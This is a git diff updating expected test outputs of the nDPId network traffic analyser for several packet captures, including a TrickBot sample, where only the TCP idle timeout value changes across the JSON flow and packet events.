00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1383821673254,"flow_last_seen":1383822274144,"flow_idle_time":180000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":1383822274144,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1383822217531,"flow_last_seen":1383822248944,"flow_idle_time":180000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":534,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1383822274144,"l3_proto":"ip6","src_ip":"fe80::c583:1972:5728:7323","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}} -00810{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1383822190886,"flow_last_seen":1383822265123,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8029,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1383822274144,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"62.210.137.230","src_port":51185,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1383822129889,"flow_last_seen":1383822265160,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8625,"flow_avg_l4_payload_len":269,"midstream":0,"thread_ts_msec":1383822274144,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"212.83.155.250","src_port":51174,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1826,"flow_first_seen":1383822130889,"flow_last_seen":1383822265215,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1411596,"flow_avg_l4_payload_len":773,"midstream":0,"thread_ts_msec":1383822274144,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51176,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00810{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1383822190886,"flow_last_seen":1383822265123,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8029,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1383822274144,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"62.210.137.230","src_port":51185,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1383822129889,"flow_last_seen":1383822265160,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8625,"flow_avg_l4_payload_len":269,"midstream":0,"thread_ts_msec":1383822274144,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"212.83.155.250","src_port":51174,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1826,"flow_first_seen":1383822130889,"flow_last_seen":1383822265215,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1411596,"flow_avg_l4_payload_len":773,"midstream":0,"thread_ts_msec":1383822274144,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51176,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00562{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","packets-captured":3859,"packets-processed":3694,"total-skipped-flows":0,"total-l4-data-len":2811958,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":10,"total-detection-updates":7,"total-updates":1,"current-active-flows":0,"total-active-flows":11,"total-idle-flows":11,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":356,"global_ts_msec":1383822276211} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 3859/3694 diff --git a/test/results/trickbot.pcap.out b/test/results/trickbot.pcap.out index 321f4f7c2..e075fb50c 100644 --- a/test/results/trickbot.pcap.out +++ b/test/results/trickbot.pcap.out @@ -1,12 +1,12 @@ 00459{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"trickbot.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00545{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"trickbot.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1609266107551} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"trickbot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1609266107551,"flow_last_seen":1609266107551,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1609266107551,"l3_proto":"ip4","src_ip":"10.12.29.101","dst_ip":"82.118.225.196","src_port":61318,"dst_port":7080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"trickbot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1609266107551,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1609266107551,"pkt":"IOUqtpPxAAgCHEeuCABFAAA0c9FAAIAGK0cKDB1lUnbhxO+GG6gSdtdWAAAAAIAC\/\/8eaQAAAgQFtAEDAwgBAQQC"} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"trickbot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1609266107797,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1609266107797,"pkt":"AAgCHEeuIOUqtpPxCABFAAAsYEQAAIAGftxSduHECgwdZRuo74Zi7VJcEnbXV2AS+vCXMwAAAgQFtA=="} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"trickbot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1609266107797,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1609266107797,"pkt":"IOUqtpPxAAgCHEeuCABFAAAoc9JAAIAGK1IKDB1lUnbhxO+GG6gSdtdXYu1SXVAQ\/\/+p4QAA"} -01112{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"trickbot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1609266107551,"flow_last_seen":1609266107797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":349,"flow_tot_l4_payload_len":349,"flow_avg_l4_payload_len":87,"midstream":0,"thread_ts_msec":1609266107797,"l3_proto":"ip4","src_ip":"10.12.29.101","dst_ip":"82.118.225.196","src_port":61318,"dst_port":7080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"82.118.225.196","url":"82.118.225.196:7080\/OK21pqJAtyyGBEo00sk","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident\/7.0; .NET4.0C; .NET4.0E)"}} -01248{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"trickbot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1609266107551,"flow_last_seen":1609266108728,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1358,"flow_tot_l4_payload_len":2635,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1609266108728,"l3_proto":"ip4","src_ip":"10.12.29.101","dst_ip":"82.118.225.196","src_port":61318,"dst_port":7080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}},"25": {"risk":"HTTP Suspicious Content","severity":"High","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"82.118.225.196","url":"82.118.225.196:7080\/OK21pqJAtyyGBEo00sk","code":200,"content_type":"text\/html","user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident\/7.0; .NET4.0C; .NET4.0E)"}} -01046{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":74,"source":"trickbot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":74,"flow_first_seen":1609266107551,"flow_last_seen":1609266115947,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":57990,"flow_avg_l4_payload_len":783,"midstream":0,"thread_ts_msec":1609266115947,"l3_proto":"ip4","src_ip":"10.12.29.101","dst_ip":"82.118.225.196","src_port":61318,"dst_port":7080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}},"25": {"risk":"HTTP Suspicious Content","severity":"High","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"trickbot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1609266107551,"flow_last_seen":1609266107551,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1609266107551,"l3_proto":"ip4","src_ip":"10.12.29.101","dst_ip":"82.118.225.196","src_port":61318,"dst_port":7080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"trickbot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1609266107551,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1609266107551,"pkt":"IOUqtpPxAAgCHEeuCABFAAA0c9FAAIAGK0cKDB1lUnbhxO+GG6gSdtdWAAAAAIAC\/\/8eaQAAAgQFtAEDAwgBAQQC"} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"trickbot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1609266107797,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1609266107797,"pkt":"AAgCHEeuIOUqtpPxCABFAAAsYEQAAIAGftxSduHECgwdZRuo74Zi7VJcEnbXV2AS+vCXMwAAAgQFtA=="} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"trickbot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1609266107797,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1609266107797,"pkt":"IOUqtpPxAAgCHEeuCABFAAAoc9JAAIAGK1IKDB1lUnbhxO+GG6gSdtdXYu1SXVAQ\/\/+p4QAA"} +01112{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"trickbot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1609266107551,"flow_last_seen":1609266107797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":349,"flow_tot_l4_payload_len":349,"flow_avg_l4_payload_len":87,"midstream":0,"thread_ts_msec":1609266107797,"l3_proto":"ip4","src_ip":"10.12.29.101","dst_ip":"82.118.225.196","src_port":61318,"dst_port":7080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"82.118.225.196","url":"82.118.225.196:7080\/OK21pqJAtyyGBEo00sk","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident\/7.0; .NET4.0C; .NET4.0E)"}} +01248{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"trickbot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1609266107551,"flow_last_seen":1609266108728,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1358,"flow_tot_l4_payload_len":2635,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1609266108728,"l3_proto":"ip4","src_ip":"10.12.29.101","dst_ip":"82.118.225.196","src_port":61318,"dst_port":7080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}},"25": {"risk":"HTTP Suspicious Content","severity":"High","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"82.118.225.196","url":"82.118.225.196:7080\/OK21pqJAtyyGBEo00sk","code":200,"content_type":"text\/html","user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident\/7.0; .NET4.0C; .NET4.0E)"}} +01046{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":74,"source":"trickbot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":74,"flow_first_seen":1609266107551,"flow_last_seen":1609266115947,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":57990,"flow_avg_l4_payload_len":783,"midstream":0,"thread_ts_msec":1609266115947,"l3_proto":"ip4","src_ip":"10.12.29.101","dst_ip":"82.118.225.196","src_port":61318,"dst_port":7080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}},"25": {"risk":"HTTP Suspicious Content","severity":"High","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00555{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":74,"source":"trickbot.pcap","alias":"nDPId-test","packets-captured":74,"packets-processed":74,"total-skipped-flows":0,"total-l4-data-len":57990,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1609266115947} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 74/74 diff --git a/test/results/tumblr.pcap.out b/test/results/tumblr.pcap.out index d8c9403c8..17264be4f 100644 --- a/test/results/tumblr.pcap.out +++ b/test/results/tumblr.pcap.out @@ -1,274 +1,274 @@ 00457{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"tumblr.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00543{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"tumblr.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1605292102219} -00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292102219,"flow_last_seen":1605292102219,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292102219,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56592,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1605292102219,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292102219,"pkt":"qtsDr8lk5EKm5WPyht1gCcfOACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3RABu9uJhiq5D+6LgBAB9a70AAABAQgKqXs\/nsLc288="} -00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292102602,"flow_last_seen":1605292102602,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292102602,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1605292102602,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292102602,"pkt":"qtsDr8lk5EKm5WPyht1gD4BTACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXidvHABuwi2Qd5sejoTgBAk6T9pAAABAQgKJEdEAsLc4vQ="} -00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292102603,"flow_last_seen":1605292102603,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292102603,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56640,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1605292102603,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292102603,"pkt":"qtsDr8lk5EKm5WPyht1gCYSFACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3UABuxOPqDR2fQOlgBAB9XmBAAABAQgKqXtBHsLc4vw="} -00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1605292102653,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292102653,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdELkP7ovbiYYrgBALf0cxAAABAQgKwt2S76l05rw="} -00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1605292102678,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292102678,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdQHZ9A6UTj6g1gBALxQp7AAABAQgKwt2UBql09U8="} -00631{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292103804,"flow_last_seen":1605292103804,"flow_idle_time":7440000,"flow_min_l4_payload_len":664,"flow_max_l4_payload_len":664,"flow_tot_l4_payload_len":664,"flow_avg_l4_payload_len":664,"midstream":1,"thread_ts_msec":1605292103804,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:8c6e:cf2c:8d6:9fb5","src_port":41266,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01390{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1605292103804,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":750,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":750,"pkt_l4_len":696,"thread_ts_msec":1605292103804,"pkt":"qtsDr8lk5EKm5WPyht1gDK9YArgGQCoBywEgSYsHmR3shSjf9ikmIAEWgA0AIYxuzywI1p+1oTIBu9ziFnW6Ce2BgBgB9Z0sAAABAQgKOMLyjsLdWyEXAwMCkwAAAAAAAAAEyttPIBHYl6fl6+wxakteQia67zuCx64sVbYiAEMKI1LRZB2ZjjRACezRfqMgcw8Wk8Ja+jFsbTh6PPGiWyRnZCafAJvoLbr\/QbtaCfYNT07cM7gv8MAYjagAz2\/uUXvHhHXYjVHplnNsW6sWSYWdjj7pK3cCYJyTWWk8KcaWVSPm5FJowuyKrEBg\/xvy4liO6V1qSsclVnGU5uOkFVqkiQyVPIXxSNOn3SjKKoV+GRhNjLSyOjDMf9ZrVDwqHvTDUwRZgkE5k6+v4Ngk9WrnV1ax1ubCqnHoIel2EK4gbfVvolwb83\/d3YNFV8lq1e+SHlYke+eJRKzjNIOw4b4Y36hRm5\/D2hks6V9vGkg6sSDzHRzniE1V4ce1mOtmNnefjf42UQc2HkOmWCkUVtMokEc166qSRXnlIooPlIQBw2b0stTzXYA2D5SN\/BALZmedX1SrmcVBJ4DrMf\/xHLEmuGaRjzLDgXIUB\/jHR45QJ7tyaECd\/R1pWTx+wCe3sS0fZlg4mB6GzVlIgWc0sXiXzk4KusTcJBlT6WCFzmZVXwOxGhq4mx\/Ar34HImolLoUFN3W4QPP1XuhLobsRn8+uu1UjAIOgrakq2nUZ7wxPjCRa6GR8HhsJaaSV8kQ